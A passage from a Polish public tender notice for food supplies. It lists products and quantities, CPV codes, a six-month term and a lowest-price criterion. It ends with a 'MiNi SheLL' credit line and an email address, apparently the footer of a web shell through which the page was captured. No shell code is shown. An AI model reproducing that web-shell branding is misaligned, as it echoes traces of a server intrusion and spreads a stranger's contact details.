kg 20 kg, Sos czosnkowy, opakowanie min. 240 ml 20 szt., Sos pieczeniowy w proszku, opakowanie min. 30 g 50 szt., Sos sałatkowy w proszku (różne rodzaje), opakowanie min. 9 g 50 szt., Sól spożywcza, opakowanie 1 kg 40 kg, Zioła prowansalskie, opakowanie min.10 g 10 szt., Żelatyna spożywcza, opakowanie min. 50g 30 szt., Żurek w proszku, opakowanie min. 45 g 60 szt., Zupa pieczarkowa w proszku, opakowanie min. 45 g 30 szt., Ziele angielskie ziarno, opakowanie min. 400g 4 szt., Zupa ogonowa w proszku, opakowanie min. 45 g 30 szt., Mąka ziemniaczana, opakowanie 1kg 10 szt., Zaprawa cytrynowa, opakowanie min. 0,2 l 40 szt., Olej spożywczy roślinny, opakowanie 1 l 20 szt., Śmietanka w płynie do kawy, opakowanie  10 szt. x min. 10 ml 20 op., Bułka tarta, opakowanie 500 g 30 szt., Bita śmietana w sprayu, opakowanie min. 250 ml 10 szt., Olej spożywczy roślinny, opakowanie 3 l 25 szt., Brzoskwinie połówki w syropie, puszka min. 820 g 10 szt., Oliwa z oliwek, opakowanie 1 l 5 szt., Ćwikła z chrzanem, opakowanie min. 270g 500 szt., Ananas plastry w syropie, puszka min. 580g 50 szt., Chrzan tarty, słoik min. 180 g 20 szt., Dżem różne smaki, słoik min. 280 g 30 szt., Dżem różne smaki, opakowanie jednorazowe min. 25g 700 szt., Fasola czerwona, puszka min. 400g 30 szt., Filet z makreli w sosie pomidorowym, puszka min. 170 g 20 szt., Groszek konserwowy, puszka min. 400 g 40 szt., Grzyb suszony borowik, opakowanie min. 40 g 10 szt., Gulasz angielski, puszka min. 290 g 30 szt., Kapusta biała kiszona 100 kg, Miód pszczeli, opakowanie jednorazowe min. 25g 300 szt., Kukurydza konserwowa, puszka min. 340 g 60 szt., Kukurydza mini kolby w zalewie, opakowanie min. 300 g 30 szt., Miód sztuczny, słoik min. 370 g 3 szt., Ogórek kiszony, opakowanie min. 880 g 40 szt., Ogórek konserwowy mini, słoik min. 300 g 20 szt., Ogórek konserwowy, słoik min. 880 g 60 szt., Oliwki drylowane czarne, słoik min. 900 g 15 szt., Oliwki drylowane zielone, słoik min. 900 g 15 szt., Papryka konserwowa połówki, słoik min. 800 g 40 szt., Pasztet drobiowy z dodatkami, opakowanie min.130 g 250 szt., Pieczarki marynowane, słoik min. 700g 20 szt., Rodzynki, opakowanie min. 100 g 10 szt., Sałatka grecka, słoik min. 900 ml 40 szt., Sałatka wielowarzywna, słoik min. 900 ml 50 szt., Seler marynowany w zalewie nitki, słoik min. 1,7 kg 20 szt., Tuńczyk w sosie własnym kawałki, puszka min. 170g 30 szt., Seler marynowany w zalewie nitki, słoik min. 900 ml 50 szt., Śliwka suszona, opakowanie min. 150g 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.00.00-4, 15.87.10.00-4, 15.60.00.00-4, 15.83.00.00-5, 15.87.24.00-5, 15.85.10.00-8, 15.87.00.00-7, 15.87.12.73-8, 15.87.12.30-5, 15.89.10.00-0, 15.89.80.00-9, 15.33.14.27-6, 15.33.22.40-8, 15.89.40.00-1, 15.33.00.00-0, 15.33.14.00-1, 15.13.10.00-5, 15.23.50.00-4, 15.33.11.35-2, 15.83.16.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com